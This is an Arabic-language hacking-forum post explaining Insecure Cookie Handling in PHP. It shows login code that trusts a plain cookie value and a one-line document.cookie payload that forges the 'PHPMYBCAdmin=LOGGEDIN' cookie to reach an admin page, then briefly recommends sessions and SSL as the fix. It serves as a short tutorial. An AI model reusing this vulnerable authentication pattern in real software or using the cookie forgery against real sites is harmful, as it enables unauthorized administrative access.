W3lc0m3 Fighter.




XBlackEGWhat is Insecure Cookie Handling (ICH) ?

XBlackEG Offline
#1
السلام عليكم ورحمه الله وبركاته
انهارده هنتكلم عن ثغرات الكوكيز او ثغره باسم
Code:
Insecure Cookie Handling
 Admin TakeOverثغرات تخطي الكوكيز من خلالها ممكن نوصل ل
انما لو مش محميه فا ممكن نرسل طلبات والتخطي والاكتشاف SSL في البدايه الكوكيز لو متشفره هترسل من خلال 
ده كود هيقرب الفكره
Code:
if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }


في الكوكيز وبدلناها بقيمه مثلا 2 هيتخطي التسجيل ويحولنا لصفحه الادمن is_user_logged يعني لو جربنا نكتب 
ناخد كود مثال كمان عشان نقربها اكتر
Code:
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:<BR><form method=post><input type=password
name=password><input type=hidden value=login name=login><input
type=submit></form>");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}


الكوده ده كده ممكن يحصل في استغلال زي لو مثلا خلينا الكوكيز كده 
Code:
"PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/"
كده تم الاستغلال 

طب الترقيع او الاصلاح ؟ 



بدال الكوكيز  SESSIONS استخدم 

SSL او تشفير
:RpS_cool:
Reply





Users browsing this thread:
2 Guest(s)



ABOUT Team of the X-fighter

All Right Reserved © Xp10.site